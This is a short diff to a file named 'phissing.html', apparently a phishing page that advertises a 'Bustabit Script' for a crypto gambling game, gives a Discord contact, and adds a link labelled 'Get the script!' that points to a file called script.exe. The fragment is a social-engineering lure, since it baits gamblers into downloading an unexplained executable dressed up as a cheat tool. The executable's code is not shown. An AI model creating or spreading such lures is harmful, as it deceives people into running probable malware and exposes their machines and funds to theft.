--- a/phissing.html
+++ b/phissing.html
@@ -14,7 +14,7 @@
 For more detail dm me on discod! </br>
 Bustabit Script!!#2544 </br>
 
-
+ <a href="script.exe">Get the script!.</a>
  </body>
 
 
